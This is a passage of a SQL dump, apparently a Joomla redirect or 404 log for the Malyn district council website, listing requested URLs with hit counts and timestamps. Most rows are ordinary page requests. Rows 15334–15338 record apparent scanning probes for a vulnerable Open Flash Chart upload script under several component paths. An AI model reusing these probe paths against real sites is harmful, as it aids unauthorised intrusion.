00:00:00',301),(15301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=421:2011-09-30-14-14-22&catid=11&lang=ru','','','',8,0,'2015-10-30 15:03:46','0000-00-00 00:00:00',301),(15302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=158:2010-11-08-08-49-05&catid=11&Itemid=16&lang=uk','','','',1,0,'2015-10-30 15:03:47','0000-00-00 00:00:00',301),(15303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=103:2010-08-12-06-54-56&catid=26&Itemid=54&lang=uk','','','',2,0,'2015-10-30 15:03:53','0000-00-00 00:00:00',301),(15304,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=181:2010-12-03-12-11-55&catid=11&Itemid=16&lang=uk','','','',5,0,'2015-10-30 15:04:04','0000-00-00 00:00:00',301),(15305,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=258:-15-&catid=11&lang=uk','','','',2,0,'2015-10-30 15:04:27','0000-00-00 00:00:00',301),(15306,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=70:2010-07-23-07-25-34&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',8,0,'2015-10-30 15:04:32','0000-00-00 00:00:00',301),(15307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=769:-16-6-&catid=11&lang=uk','','','',3,0,'2015-10-30 15:04:39','0000-00-00 00:00:00',301),(15308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=66:2010-07-21-07-33-49&catid=11&Itemid=16&lang=en','','','',3,0,'2015-10-30 15:04:43','0000-00-00 00:00:00',301),(15309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-10-30 15:04:44','0000-00-00 00:00:00',301),(15310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=ru&Itemid=','','','',4,0,'2015-10-30 15:04:45','0000-00-00 00:00:00',301),(15311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=135:-9-2010-&catid=11&lang=uk','','','',3,0,'2015-10-30 15:04:50','0000-00-00 00:00:00',301),(15312,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=25','','','',23,0,'2015-10-30 15:04:53','0000-00-00 00:00:00',301),(15313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=831:2012-11-27-15-13-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-10-30 15:04:54','0000-00-00 00:00:00',301),(15314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=278:2011-03-28-13-59-49&catid=11&lang=uk','','','',3,0,'2015-10-30 15:04:57','0000-00-00 00:00:00',301),(15315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26&Itemid=54&lang=en','','','',4,0,'2015-10-30 15:05:01','0000-00-00 00:00:00',301),(15316,'http://www.malyn-rayrada.org.ua/index.php/--30042014-/783-pro-programu-socialno-ekonomichnogo-rozvitku_4','','','',3,0,'2015-10-30 15:05:06','0000-00-00 00:00:00',301),(15317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=847:-17-6-&catid=11&lang=en','','','',2,0,'2015-10-30 15:05:10','0000-00-00 00:00:00',301),(15318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=12:2010-06-05-15-24-35&catid=11&Itemid=16&lang=ru','','','',1,0,'2015-10-30 15:05:13','0000-00-00 00:00:00',301),(15319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=179:2010-11-30-09-08-30&catid=11&lang=en','','','',3,0,'2015-10-30 15:05:34','0000-00-00 00:00:00',301),(15320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=12:2010-06-05-15-24-35&catid=11&Itemid=16&lang=en','','','',2,0,'2015-10-30 15:05:35','0000-00-00 00:00:00',301),(15321,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=20','','','',3,0,'2015-10-30 15:05:50','0000-00-00 00:00:00',301),(15322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=20','','','',6,0,'2015-10-30 15:05:56','0000-00-00 00:00:00',301),(15323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-10-30 15:06:01','0000-00-00 00:00:00',301),(15324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru&limitstart=20','','','',7,0,'2015-10-30 15:06:05','0000-00-00 00:00:00',301),(15325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=104:-2010-&catid=26:--11082010-&Itemid=54&lang=ru','','','',2,0,'2015-10-30 15:06:14','0000-00-00 00:00:00',301),(15326,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/416-pro-vstanovlennja-mezh-silskih-naselenih-punktiv_2','','','',26,0,'2015-10-30 15:06:16','0000-00-00 00:00:00',301),(15327,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?start=15','','','',28,0,'2015-10-30 15:06:18','0000-00-00 00:00:00',301),(15328,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/678-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_23','','','',33,0,'2015-10-30 15:06:28','0000-00-00 00:00:00',301),(15329,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/215-pro-efektivnist-finansovoi-pidtrimki-nadanoi-z','','','',13,0,'2015-10-30 15:06:31','0000-00-00 00:00:00',301),(15330,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/864-pro-pogodzhennya-stvorennya-vidokremlenogo-pidrozdilu-malinskogo-miskrajonnogo-teritorialnogo-medichnogo-ob-ednannya','','','',16,0,'2015-10-30 15:11:56','0000-00-00 00:00:00',301),(15331,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/81-rishennja-prijnjati-na-4-sesii-malinskoi-rajonnoi','','','',16,0,'2015-10-30 15:15:58','0000-00-00 00:00:00',301),(15332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34:--15062011-&Itemid=68&lang=en','','','',8,0,'2015-10-30 15:22:11','0000-00-00 00:00:00',301),(15333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=uk&limitstart=15','','','',5,0,'2015-10-30 15:25:25','0000-00-00 00:00:00',301),(15334,'http://malyn-rayrada.org.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',2,0,'2015-10-30 15:33:07','0000-00-00 00:00:00',301),(15335,'http://malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',2,0,'2015-10-30 15:33:07','0000-00-00 00:00:00',301),(15336,'http://malyn-rayrada.org.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',2,0,'2015-10-30 15:33:08','0000-00-00 00:00:00',301),(15337,'http://malyn-rayrada.org.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',2,0,'2015-10-30 15:33:08','0000-00-00 00:00:00',301),(15338,'http://malyn-rayrada.org.ua/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',2,0,'2015-10-30 15:33:09','0000-00-00 00:00:00',301),(15339,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik','','','',18,0,'2015-10-30 15:41:10','0000-00-00 00:00:00',301),(15340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&catid=30:--30122010-&Itemid=61&lang=uk','','','',3,0,'2015-10-30 15:42:47','0000-00-00 00:00:00',301),(15341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=en&limitstart=5','','','',5,0,'2015-10-30 15:43:17','0000-00-00 00:00:00',301),(15342,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/998-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu','','','',47,0,'2015-10-30 15:45:21','0000-00-00 00:00:00',301),(15343,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/866-pro-pogodzhennya-zvilnennya-ta-priznachennya-na-posadi-direktoriv-shkil-rajonu','','','',75,0,'2015-10-30 15:51:20','0000-00-00 00:00:00',301),(15344,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/207-pro-zvit-golovi-postijnoi-komisii-rajonnoi-radi-z','','','',13,0,'2015-10-30 15:51:29','0000-00-00 00:00:00',301),(15345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=ru','','','',4,0,'2015-10-30 15:56:41','0000-00-00 00:00:00',301),(15346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=en&limitstart=20','','','',3,0,'2015-10-30 15:56:50','0000-00-00 00:00:00',301),(15347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=602:2012-03-02-08-12-58&catid=11&lang=uk','','','',2,0,'2015-10-30 16:00:02','0000-00-00 00:00:00',301),(15348,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1199-pro-zatverdzhennya-polozhennya-pro-poryadok-nadannya-pilg-z-orendnoji-plati-za-majno-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',19,0,'2015-10-30 16:05:18','0000-00-00 00:00:00',301),(15349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=207:2010-12-15-14-22-39&catid=29&Itemid=60&lang=en','','','',19,0,'2015-10-30 16:05:20','0000-00-00 00:00:00',301),(15350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33&Itemid=66&lang=en','','','',15,0,'2015-10-30 16:05:57','0000-00-00 00:00:00',301),(15351,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1190-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-yunigran','','','',10,0,'2015-10-30 16:06:14','0000-00-00 00:00:00',301),(15352,'http://www.malyn-rayrada.org.ua/index.php/--28032012-/284-pro-vikoristannja-koshtiv-shho-nadijshli-u','','','',4,0,'2015-10-30 16:06:14','0000-00-00 00:00:00',301),(15353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=356:2011-06-25-06-23-35&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-10-30 16:06:31','0000-00-00 00:00:00',301),(15354,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/237-pro-vstup-malinskoi-rajonnoi-radi-do-vseukrainskoi','','','',12,0,'2015-10-30 16:06:39','0000-00-00 00:00:00',301),(15355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=195:------------2010-&catid=29&Itemid=60&lang=ru','','','',2,0,'2015-10-30 16:06:49','0000-00-00 00:00:00',301),(15356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=282:2011-04-07-09-44-12&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 16:07:00','0000-00-00 00:00:00',301),(15357,'http://www.malyn-rayrada.org.ua/index.php/--20062014-/824-pro-stan-nadannja-medichnoi-dopomogi-zhiteljam','','','',3,0,'2015-10-30 16:07:05','0000-00-00 00:00:00',301),(15358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=73:2010-07-27-14-17-18&catid=11&Itemid=16&lang=uk','','','',3,0,'2015-10-30 16:07:59','0000-00-00 00:00:00',301),(15359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=94:-----------2010-&catid=26&Itemid=54&lang=en','','','',2,0,'2015-10-30 16:08:16','0000-00-00 00:00:00',301),(15360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&Itemid=14&lang=en','','','',3,0,'2015-10-30 16:08:20','0000-00-00 00:00:00',301),(15361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=769:-16-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-10-30 16:08:28','0000-00-00 00:00:00',301),(15362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26&Itemid=54&lang=uk','','','',2,0,'2015-10-30 16:08:54','0000-00-00 00:00:00',301),(15363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=96:2010-08-12-06-09-14&catid=26&Itemid=54&lang=uk','','','',5,0,'2015-10-30 16:08:58','0000-00-00 00:00:00',301),(15364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=96:2010-08-12-06-09-14&catid=26&Itemid=54&lang=en','','','',2,0,'2015-10-30 16:09:14','0000-00-00 00:00:00',301),(15365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=124:2010-09-10-18-13-17&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2015-10-30 16:09:27','0000-00-00 00:00:00',301),(15366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=193:------------2009-2010-&catid=29:--15122010-&Itemid=60&lang=ru','','','',30,0,'2015-10-30 16:10:05','0000-00-00 00:00:00',301),(15367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=243:-l-2011r-&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-10-30 16:10:13','0000-00-00 00:00:00',301),(15368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=103:2010-08-12-06-54-56&catid=26:--11082010-&Itemid=54&lang=ru','','','',4,0,'2015-10-30 16:10:55','0000-00-00 00:00:00',301),(15369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=8:2010-06-05-15-08-15&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2015-10-30 16:11:16','0000-00-00 00:00:00',301),(15370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26&Itemid=54&lang=ru','','','',2,0,'2015-10-30 16:11:33','0000-00-00 00:00:00',301),(15371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-10-30 16:11:37','0000-00-00 00:00:00',301),(15372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=239:2011-01-22-12-27-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-10-30 16:11:50','0000-00-00 00:00:00',301),(15373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=215:-2008-2010-&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 16:11:58','0000-00-00 00:00:00',301),(15374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=248:2011-02-21-08-30-45&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-10-30 16:12:07','0000-00-00 00:00:00',301),(15375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 16:13:05','0000-00-00 00:00:00',301),(15376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26:--11082010-&Itemid=54&lang=ru','','','',2,0,'2015-10-30 16:13:22','0000-00-00 00:00:00',301),(15377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=216:-l-2010r&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',2,0,'2015-10-30 16:13:35','0000-00-00 00:00:00',301),(15378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=en','','','',4,0,'2015-10-30 16:14:00','0000-00-00 00:00:00',301),(15379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=153:2010-10-26-13-18-23&catid=11&lang=en&Itemid=','','','',2,0,'2015-10-30 16:14:42','0000-00-00 00:00:00',301),(15380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=175:2010-11-25-06-59-30&catid=11&lang=uk','','','',3,0,'2015-10-30 16:14:50','0000-00-00 00:00:00',301),(15381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=216:-l-2010r&catid=11&lang=en','','','',2,0,'2015-10-30 16:15:07','0000-00-00 00:00:00',301),(15382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=162:2010-11-10-06-12-51&catid=11&lang=en&Itemid=','','','',2,0,'2015-10-30 16:15:42','0000-00-00 00:00:00',301),(15383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',5,0,'2015-10-30 16:15:45','0000-00-00 00:00:00',301),(15384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=102:2010-08-12-06-52-12&catid=26&Itemid=54&lang=uk','','','',2,0,'2015-10-30 16:15:49','0000-00-00 00:00:00',301),(15385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=216:-l-2010r&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-10-30 16:15:58','0000-00-00 00:00:00',301),(15386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=168:2010-11-18-06-28-34&catid=28:-22102010-&Itemid=59&lang=uk','','','',1,0,'2015-10-30 16:16:06','0000-00-00 00:00:00',301),(15387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=240:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-10-30 16:16:44','0000-00-00 00:00:00',301),(15388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=165:2010-11-17-13-23-56&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2015-10-30 16:16:49','0000-00-00 00:00:00',301),(15389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=135:-9-2010-&catid=11&lang=uk&Itemid=','','','',2,0,'2015-10-30 16:17:35','0000-00-00 00:00:00',301),(15390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=96:2010-08-12-06-09-14&catid=26:--11082010-&Itemid=54&lang=en','','','',2,0,'2015-10-30 16:17:39','0000-00-00 00:00:00',301),(15391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=246:2011-02-09-09-55-04&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 16:17:47','0000-00-00 00:00:00',301),(15392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=119&lang=ru&Itemid=','','','',2,0,'2015-10-30 16:18:04','0000-00-00 00:00:00',301),(15393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=421:2011-09-30-14-14-22&catid=11&lang=uk&Itemid=','','','',7,0,'2015-10-30 16:18:08','0000-00-00 00:00:00',301),(15394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=126:2010-09-13-08-28-01&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',2,0,'2015-10-30 16:18:22','0000-00-00 00:00:00',301),(15395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=96:2010-08-12-06-09-14&catid=26:--11082010-&Itemid=54&lang=uk','','','',2,0,'2015-10-30 16:18:34','0000-00-00 00:00:00',301),(15396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=846:2012-12-10-14-06-00&catid=46&Itemid=85&lang=ru','','','',3,0,'2015-10-30 16:19:11','0000-00-00 00:00:00',301),(15397,'http://www.malyn-rayrada.org.ua/index.php/1141-budo-vorob-jivska-silska-rada-informue','','','',5,0,'2015-10-30 16:19:20','0000-00-00 00:00:00',301),(15398,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=15','','','',7,0,'2015-10-30 16:20:23','0000-00-00 00:00:00',301),(15399,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku','','','',45,0,'2015-10-30 16:21:05','0000-00-00 00:00:00',301),(15400,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/573-pro-klopotannja-pered-departamentom-praci-ta','','','',18,0,'2015-10-30 16:21:35','0000-00-00 00:00:00',301),(15401,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/124-pro-zvit-nachalnika-viddilu-derzhkomzemu-v','','','',20,0,'2015-10-30 16:21:39','0000-00-00 00:00:00',301),(15402,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/534-pro-zvernennja-do-verhovnoi-radi-ukraini-shhodo','','','',16,0,'2015-10-30 16:22:09','0000-00-00 00:00:00',301),(15403,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/966-pro-zvernennya-do-prezidenta-ukrajini-golovi-verkhovnoji-radi-ukrajini-prem-er-ministra-ukrajini-shchodo-zberezhennya-4-ji-zoni-posilenogo-radiologichnogo-kontrolyu','','','',5,0,'2015-10-30 16:22:55','0000-00-00 00:00:00',301),(15404,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=10','','','',6,0,'2015-10-30 16:23:16','0000-00-00 00:00:00',301),(15405,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=20','','','',5,0,'2015-10-30 16:24:07','0000-00-00 00:00:00',301),(15406,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/636-pro-stan-zlochinnosti-na-teritorii-malinskogo','','','',19,0,'2015-10-30 16:24:11','0000-00-00 00:00:00',301),(15407,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=10','','','',4,0,'2015-10-30 16:24:28','0000-00-00 00:00:00',301),(15408,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-?start=21','','','',13,0,'2015-10-30 16:24:53','0000-00-00 00:00:00',301),(15409,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=7','','','',16,0,'2015-10-30 16:28:16','0000-00-00 00:00:00',301),(15410,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?start=15','','','',6,0,'2015-10-30 16:30:24','0000-00-00 00:00:00',301),(15411,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=5','','','',3,0,'2015-10-30 16:53:43','0000-00-00 00:00:00',301),(15412,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/960-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2015-2017-ro','','','',1,0,'2015-10-30 17:00:00','0000-00-00 00:00:00',301),(15413,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/263-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii','','','',25,0,'2015-10-30 17:11:06','0000-00-00 00:00:00',301),(15414,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku','','','',38,0,'2015-10-30 17:24:25','0000-00-00 00:00:00',301),(15415,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/120-pro-nadannja-zgodi-na-ctvorennja-malinskogo','','','',22,0,'2015-10-30 17:25:55','0000-00-00 00:00:00',301),(15416,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/518-pro-vnesennja-zmin-do-proektu-formuvannja','','','',76,0,'2015-10-30 17:32:35','0000-00-00 00:00:00',301),(15417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=uk','','','',8,0,'2015-10-30 17:49:27','0000-00-00 00:00:00',301),(15418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=165:2010-11-17-13-23-56&catid=11&Itemid=16&lang=uk','','','',10,0,'2015-10-30 17:59:09','0000-00-00 00:00:00',301),(15419,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',18,0,'2015-10-30 18:03:02','0000-00-00 00:00:00',301),(15420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-10-30 18:41:42','0000-00-00 00:00:00',301),(15421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=uk&limitstart=5','','','',7,0,'2015-10-30 18:46:59','0000-00-00 00:00:00',301),(15422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=en','','','',10,0,'2015-10-30 19:31:45','0000-00-00 00:00:00',301),(15423,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/695-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_17','','','',15,0,'2015-10-30 20:12:42','0000-00-00 00:00:00',301),(15424,'http://www.malyn-rayrada.org.ua/attachments/article/26/history malyn region2.PDF','','','',70,0,'2015-10-30 20:20:47','0000-00-00 00:00:00',301),(15425,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-','','','',1,0,'2015-10-30 21:10:35','0000-00-00 00:00:00',301),(15426,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/354-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_13','','','',13,0,'2015-10-30 21:13:23','0000-00-00 00:00:00',301),(15427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=uk','','','',16,0,'2015-10-30 21:18:13','0000-00-00 00:00:00',301),(15428,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1202-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',21,0,'2015-10-30 21:19:22','0000-00-00 00:00:00',301),(15429,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/496-pro-zvernennja-do-direktora-departamentu-finansiv','','','',33,0,'2015-10-30 21:22:45','0000-00-00 00:00:00',301),(15430,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1205-pro-zvernennya-do-kerivnitstva-dp-propan-shchodo-zabezpechennya-zhiteliv-rajonu-skraplenim-gazom','','','',23,0,'2015-10-30 21:23:47','0000-00-00 00:00:00',301),(15431,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?limitstart=0','','','',8,0,'2015-10-30 21:25:39','0000-00-00 00:00:00',301),(15432,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/195-pro-zatverdzhennja-tehnichnoi-dokumentacii-z','','','',51,0,'2015-10-30 21:27:12','0000-00-00 00:00:00',301),(15433,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/243-pro-pogodzhennja-vvedennja-shtatnoi-odinici','','','',17,0,'2015-10-30 21:33:03','0000-00-00 00:00:00',301),(15434,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/362-pro-zminu-nazvi-nedashkivskoi-zosh-i-iii-stupeniv','','','',53,0,'2015-10-30 21:36:23','0000-00-00 00:00:00',301),(15435,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/629-pro-peredachu-budivli-lokomotivnogo-depo-na-balans','','','',39,0,'2015-10-30 21:36:51','0000-00-00 00:00:00',301),(15436,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/556-pro-pereobrannja-golovi-postijnoi-komisii-rajonnoi','','','',50,0,'2015-10-30 21:37:16','0000-00-00 